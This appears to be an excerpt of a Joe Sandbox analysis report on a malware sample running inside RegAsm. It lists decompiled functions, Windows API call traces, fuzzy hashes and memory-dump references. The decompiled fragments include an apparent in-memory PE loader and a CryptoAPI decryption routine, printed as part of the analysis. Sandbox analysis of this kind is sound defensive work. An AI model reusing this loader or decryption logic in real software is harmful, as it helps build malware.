String ID:
API String ID: 1279760036-0
Opcode ID: 9dfe5af6aa50fba37892bca16c4149dff410713360ec368b1e5e6520459fdb72
Instruction ID: 47cdc93be5718acd1e085c7ad23ef542e25245b27401863dec7c67a6ed8ec2d2
Opcode Fuzzy Hash: 9dfe5af6aa50fba37892bca16c4149dff410713360ec368b1e5e6520459fdb72
Instruction Fuzzy Hash: 5EB01231000104EBCA21AB80DD14F097B21E770701F114010B214800F8C3711860FF18

Uniqueness

Uniqueness Score: -1.00%

Function 03F04CF5, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 18ea43ad9b41b2be3292fab4b591c7a0634ad9a10b00b318fbdf436d36cf13cc
Instruction ID: c0757bb4608eff67ab7a11ee072f7741cc2589c8698cdb453e2a38050465aa12
Opcode Fuzzy Hash: 18ea43ad9b41b2be3292fab4b591c7a0634ad9a10b00b318fbdf436d36cf13cc
Instruction Fuzzy Hash: DDB01231000104EBCA31AB80DD14F097B21E770701F114410B214800F8C3715860FF08

Uniqueness

Uniqueness Score: -1.00%

Function 010A3D15, Relevance: 1.3, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A3D15(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E010A7718(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E010A4573(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E010A2625(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E010A12A3(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E010A7479(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x010a3d20
0x010a3d23
0x010a3d2c
0x010a3d2f
0x010a3d32
0x010a3d35
0x010a3e31
0x010a3e35
0x010a3d47
0x010a3d53
0x010a3d5a
0x010a3d61
0x00000000
0x00000000
0x010a3d67
0x010a3d6f
0x00000000
0x00000000
0x010a3d75
0x010a3d7e
0x010a3d82
0x00000000
0x00000000
0x010a3d84
0x010a3d8b
0x010a3d90
0x010a3d92
0x010a3d95
0x010a3e16
0x010a3e1d
0x010a3e1f
0x00000000
0x00000000
0x010a3e21
0x010a3e25
0x010a3e2a
0x010a3e2a
0x00000000
0x010a3e25
0x010a3d9c
0x010a3da4
0x010a3da4
0x010a3dad
0x010a3dbb
0x010a3e12
0x010a3e12
0x00000000
0x010a3dde
0x010a3de1
0x00000000
0x010a3de1
0x010a3dbb
0x010a3df0
0x010a3dfe
0x010a3e03
0x010a3e05
0x010a3e1a
0x00000000
0x010a3e1a
0x010a3e07
0x010a3e0d
0x010a3e10
0x00000000
0x00000000
0x00000000
0x010a3e10

APIs

memcpy.NTDLL(00000000,?,?,?,?,010A673C,?,010A673C,?,010A673C), ref: 010A3D9C

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 5d06c3b68567734b61cc6fe1e8540c24691568df085a83cdc4fdc7765dd98ea1
Instruction ID: 03c2f607f246bf63919b88720903029a0d2f60b763c0025653db82b3d35e409f
Opcode Fuzzy Hash: 5d06c3b68567734b61cc6fe1e8540c24691568df085a83cdc4fdc7765dd98ea1
Instruction Fuzzy Hash: BF313E71E00219EEDF51DFE8C880AEEB7B9BB14314F9045A9E685AB181D7309E558F60

Uniqueness

Uniqueness Score: -1.00%

Function 004016FC, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004016FC(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x404180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45);
				_t18 = E00401E53( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x69b24f45 &  !( *0x404180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401B3B(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E004012E6(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401204(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E00401BB2(_t42);
					L8:
					return _t29;
				}
			}

0x00401704
0x00401706
0x00401722
0x00401733
0x0040173a
0x00401798
0x00000000
0x0040173c
0x0040173c
0x00401746
0x0040174a
0x0040174f
0x00401752
0x00401757
0x0040175b
0x00401760
0x00401765
0x00401769
0x0040176e
0x0040176f
0x00401773
0x00401778
0x00401780
0x00401780
0x00401778
0x00401769
0x0040175b
0x00401782
0x0040178b
0x0040178f
0x00401799
0x0040179f
0x0040179f

APIs

Part of subcall function 00401E53: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,00401738,?,?,?,?,00000002,?,?,?), ref: 00401E77
Part of subcall function 00401E53: GetProcAddress.KERNEL32(00000000,?), ref: 00401E99
Part of subcall function 00401E53: GetProcAddress.KERNEL32(00000000,?), ref: 00401EAF
Part of subcall function 00401E53: GetProcAddress.KERNEL32(00000000,?), ref: 00401EC5
Part of subcall function 00401E53: GetProcAddress.KERNEL32(00000000,?), ref: 00401EDB
Part of subcall function 00401E53: GetProcAddress.KERNEL32(00000000,?), ref: 00401EF1

Part of subcall function 004012E6: LoadLibraryA.KERNELBASE(00000002,00000002,00000000,?,?), ref: 0040131E

Part of subcall function 00401204: VirtualProtect.KERNELBASE(00000000,?,?,?,?,00000002,00000000,?,00000002), ref: 0040123D
Part of subcall function 00401204: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 004012B2
Part of subcall function 00401204: GetLastError.KERNEL32 ref: 004012B8

GetLastError.KERNEL32(?,?,?,?), ref: 0040177A

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 2d036d7bc7b6ee58955737f803561dd81905a6b60b4b78f0254ff6001408a52c
Instruction ID: 2046e882ee3dd236206ae2eea37fcc4804f9a983ffbf6def61af3e9c3624beff
Opcode Fuzzy Hash: 2d036d7bc7b6ee58955737f803561dd81905a6b60b4b78f0254ff6001408a52c
Instruction Fuzzy Hash: A6110B766007056BD721AA95CDC0DAB77BCAF88318700417EFA02B7652EA74ED058794

Uniqueness

Uniqueness Score: -1.00%

Function 03F1ED14, Relevance: 1.3, APIs: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

HeapFree.KERNEL32(00000000,03F1BD19,00000000,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F1EDA6

Part of subcall function 03F03979: memcpy.NTDLL(03F0AAC3,03F0AAC3,00000000,03F0AAC3,03F0AAC3,03F0AAC3,00000000,?,?,03F1A03B,00000000,00000001,-00000007,03F0AAC3,00000000), ref: 03F0399C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID:
API String ID: 1301464996-0
Opcode ID: 3073898b76e3d14a7b9453d6eb90346d9ba655c0cf79cac88ffe9894b185ff92
Instruction ID: d7aa6607f66f9e7319b29648d2ec971f1390b5c2c4de51340099ad46b77a64d8
Opcode Fuzzy Hash: 3073898b76e3d14a7b9453d6eb90346d9ba655c0cf79cac88ffe9894b185ff92
Instruction Fuzzy Hash: 6611CA75A10205FFDB24DB49ECA1EBD7BA9EB68310F100065F901DB291D7709D109B50

Uniqueness

Uniqueness Score: -1.00%

Function 03F194AC, Relevance: 1.3, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,03F2C214,00000018,03F1B59C,043A8E6E,?,03F1B59C,043A8E6E,?,03F1B59C,043A8E6E,?,?,?,?,03F1B59C), ref: 03F19561

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 84bf4fbfb3560dafbed0482171e4fa57dcab63ffb48e4613bba625e2d522ce6b
Instruction ID: d27becb3049cb262cd8dc2b22ccfd0a083716f439e441caa4ae408eeb6825163
Opcode Fuzzy Hash: 84bf4fbfb3560dafbed0482171e4fa57dcab63ffb48e4613bba625e2d522ce6b
Instruction Fuzzy Hash: D511A231600509EFD770EF86FC61C9A3BA8EBA47507148222E5098B1B9DB705512CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 03F235FC, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,03F21EC6,03F226D2,00000000,00000000), ref: 03F2366D

Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7DD
Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7EC

Part of subcall function 03F1E380: CloseHandle.KERNEL32(00000001,?,00000000,00000000,00000000,00000000,00000000,74E5F5B0,03F21D54,?,00000001), ref: 03F1E3A6
Part of subcall function 03F1E380: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 03F1E3B2
Part of subcall function 03F1E380: GetModuleHandleA.KERNEL32(?,043A9732,?,00000000,00000000), ref: 03F1E3D2
Part of subcall function 03F1E380: GetProcAddress.KERNEL32(00000000), ref: 03F1E3D9
Part of subcall function 03F1E380: Thread32First.KERNEL32(00000001,0000001C), ref: 03F1E3E9
Part of subcall function 03F1E380: CloseHandle.KERNEL32(00000001), ref: 03F1E431

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID:
API String ID: 2627809124-0
Opcode ID: c00f3ba811c1b242fca7a3ba6564ca05645526dd90770543e14335e8106a4dc7
Instruction ID: 3f4804bbe769f6d9669f1d0d4c7168195c415c2bba987aa5c6ce84901be9829e
Opcode Fuzzy Hash: c00f3ba811c1b242fca7a3ba6564ca05645526dd90770543e14335e8106a4dc7
Instruction Fuzzy Hash: CC01A275A10218FFDB21EBA9EDA9C9FBBECEB152447140155F901D3200E735AE00DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F038FA, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,03F21EC1,03F226D2,00000000,00000000), ref: 03F03970

Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(1D4E36C0,0000002E,00000000,00000000,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7DD
Part of subcall function 03F1F7CB: StrChrA.SHLWAPI(00000004,00000020,?,1D4E36C0,03F03956,00000000,00000000,00000000), ref: 03F1F7EC

Part of subcall function 03F0A873: lstrlen.KERNEL32(03F046D1,00000000,?,00000000,?,?,03F046D1,00000035,00000000,?,00000000), ref: 03F0A8A3
Part of subcall function 03F0A873: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03F0A8B9
Part of subcall function 03F0A873: memcpy.NTDLL(00000010,03F046D1,00000000,?,?,03F046D1,00000035,00000000), ref: 03F0A8EF
Part of subcall function 03F0A873: memcpy.NTDLL(00000010,00000000,00000035,?,?,03F046D1,00000035), ref: 03F0A90A
Part of subcall function 03F0A873: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03F0A928
Part of subcall function 03F0A873: GetLastError.KERNEL32(?,?,03F046D1,00000035), ref: 03F0A932
Part of subcall function 03F0A873: HeapFree.KERNEL32(00000000,00000000,?,?,03F046D1,00000035), ref: 03F0A955

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID:
API String ID: 730886825-0
Opcode ID: 5760d76f8719fbca51f4d56c715e0e0f0c8e21e23b8d098ff659ff663bca844f
Instruction ID: 54078c3fd4c5e6d57de203a04fcedbaebe43db421483f0d09919f20502ca1c1a
Opcode Fuzzy Hash: 5760d76f8719fbca51f4d56c715e0e0f0c8e21e23b8d098ff659ff663bca844f
Instruction Fuzzy Hash: 6501BC35A10208FBDB21EBA9ED15F9E7BECEB15700F100055FA41A7184DB70AA00EB61

Uniqueness

Uniqueness Score: -1.00%

Function 03F1ABA2, Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

memset.NTDLL ref: 03F1ABC0

Part of subcall function 03F05DA4: memset.NTDLL ref: 03F05DCA
Part of subcall function 03F05DA4: memcpy.NTDLL ref: 03F05DF2
Part of subcall function 03F05DA4: GetLastError.KERNEL32(00000010,00000218,03F2503D,00000100,?,00000318,00000008), ref: 03F05E09
Part of subcall function 03F05DA4: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,03F2503D,00000100), ref: 03F05EEC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: 02d52437fcbe2fa0f8e0d78e401ba6d98de19d2feed55095406d07c44bad5f44
Instruction ID: 82377c4ab054c7fa043a1b099fd234d8a41b3f203fa5b50d9641265ba4f8f9c0
Opcode Fuzzy Hash: 02d52437fcbe2fa0f8e0d78e401ba6d98de19d2feed55095406d07c44bad5f44
Instruction Fuzzy Hash: 470126349023496BCB21DF2DED40F4B7BE8AF44614F048429FC448B240C771D82097A0

Uniqueness

Uniqueness Score: -1.00%

Function 010A21C6, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E010A21C6(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E010A7479( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E010A4573(_a8 + _a8);
					if(_t21 != 0) {
						E010A30E0(_a4, _t21, _t23);
					}
					E010A2625(_a4);
				}
				return _t21;
			}

0x010a21ce
0x010a21d5
0x010a21d7
0x010a21e6
0x010a21ed
0x010a21fc
0x010a2200
0x010a2207
0x010a2207
0x010a220f
0x010a2214
0x010a2219

APIs

lstrlen.KERNEL32(00000000,00000000,010A2E14,00000000,?,010A27E3,00000000,010A2E14,?,00000000,010A2E14,00000000,03409630), ref: 010A21D7

Part of subcall function 010A7479: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,010A21EB,00000001,010A2E14,00000000), ref: 010A74B1
Part of subcall function 010A7479: memcpy.NTDLL(010A21EB,010A2E14,00000010,?,?,?,010A21EB,00000001,010A2E14,00000000,?,010A27E3,00000000,010A2E14,?,00000000), ref: 010A74CA
Part of subcall function 010A7479: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 010A74F3
Part of subcall function 010A7479: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 010A750B
Part of subcall function 010A7479: memcpy.NTDLL(00000000,00000000,03409630,00000010), ref: 010A755D

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 6ff760d7ca564024d0187f0a06fadb51ae1667e64ada97f670abfbfd0ead2380
Instruction ID: 17ec2b1506b7a729c54ae9c30c2b681ab23ba6bcc164a9de176073189bd05e91
Opcode Fuzzy Hash: 6ff760d7ca564024d0187f0a06fadb51ae1667e64ada97f670abfbfd0ead2380
Instruction Fuzzy Hash: 23F05476140109BBCF126E99DC00DEB3FADEF882A4B408021FD98CA010DB72D55597A0

Uniqueness

Uniqueness Score: -1.00%

Function 010A3A49, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A3A49(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E010A35A9(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E010A4588(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x010a3a51
0x010a3a6b
0x00000000
0x010a3a87
0x010a3a62
0x010a3a69
0x00000000
0x00000000
0x010a3a8e

APIs

lstrlenW.KERNEL32(?,?,?,010A19EA,3D010A90,80000002,010A2148,010A5FF9,74666F53,4D4C4B48,010A5FF9,?,3D010A90,80000002,010A2148,?), ref: 010A3A6E

Part of subcall function 010A4588: SysAllocString.OLEAUT32(010A5FF9), ref: 010A45A2
Part of subcall function 010A4588: SysFreeString.OLEAUT32(00000000), ref: 010A45E2

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 179e36bca15030dc7d5b8d853b0456d622557fd0f63621fd9538888c2bd407ba
Instruction ID: 5c2a00ab4277b01fb07b4a9788f9b960b70fd640ae6710d2f859ff49c59488f7
Opcode Fuzzy Hash: 179e36bca15030dc7d5b8d853b0456d622557fd0f63621fd9538888c2bd407ba
Instruction Fuzzy Hash: AFF0923200010EBFDF169F95DC05EDA3F6AFB28390F448414BA4459061D772C5B1EB90

Uniqueness

Uniqueness Score: -1.00%

Function 010A218F, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A218F(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E010A4F41(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E010A2625(_a4);
				}
				return _t12;
			}

0x010a219b
0x010a21a0
0x010a21a4
0x010a21ab
0x010a21b6
0x010a21ba
0x010a21ba
0x010a21c3

APIs

Part of subcall function 010A4F41: memcpy.NTDLL(00000000,00000110,010A673C,010A673C,?,?,010A673C,?,?,010A3BD3,?), ref: 010A4F77
Part of subcall function 010A4F41: memset.NTDLL ref: 010A4FEC
Part of subcall function 010A4F41: memset.NTDLL ref: 010A5000

memcpy.NTDLL(010A673C,010A673C,00000000,010A673C,010A673C,010A673C,?,?,010A3BD3,?,?,010A673C,?), ref: 010A21AB

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: f3b189d8d724278a17ee5805a66b275198b3a5a43b5414d5fac90333b9a841e2
Instruction ID: 2b03eb054970901b0c22ee03ca8121219311a746767ff2a71b3b9386a81de6fa
Opcode Fuzzy Hash: f3b189d8d724278a17ee5805a66b275198b3a5a43b5414d5fac90333b9a841e2
Instruction Fuzzy Hash: 93E0C23B80112AB7CB122AD4EC00EEF7F6CCF656E0F444020FE88CA204DA31D62093E1

Uniqueness

Uniqueness Score: -1.00%

Function 03F0D23A, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F0D244

Part of subcall function 03F15C28: RegOpenKeyExA.KERNELBASE(03F0D25C,00000000,00000000,00020119,80000001,00000000,?,00000000,?,00000000,?,03F0D25C,80000001,?,03F14958), ref: 03F15C6F
Part of subcall function 03F15C28: RegOpenKeyExA.ADVAPI32(03F0D25C,03F0D25C,00000000,00020019,80000001,?,03F0D25C,80000001,?,03F14958), ref: 03F15C85
Part of subcall function 03F15C28: RegCloseKey.ADVAPI32(80000001,80000001,?,03F14958,03F14968,?,03F0D25C,80000001,?,03F14958), ref: 03F15CCE

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: d790cfc242ba07489b7dc3805b5c28f11e9ddfd700b0d28ceaa486dfb567f6f7
Instruction ID: 5e362556fb0e5cce0eab787475bca2d2cf52a7af3e61845269b08bbe5164b7db
Opcode Fuzzy Hash: d790cfc242ba07489b7dc3805b5c28f11e9ddfd700b0d28ceaa486dfb567f6f7
Instruction Fuzzy Hash: F2E0EC34240208B7DB10EE94DC41F9A7758DB45790F008019BE0C5E281DA71EA749795

Uniqueness

Uniqueness Score: -1.00%

Function 03F1425B, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,03F285A0,0000002C,03F1E6A6,043A8E6E,?,00000000,03F05DD7,?,00000318), ref: 03F14275

Memory Dump Source

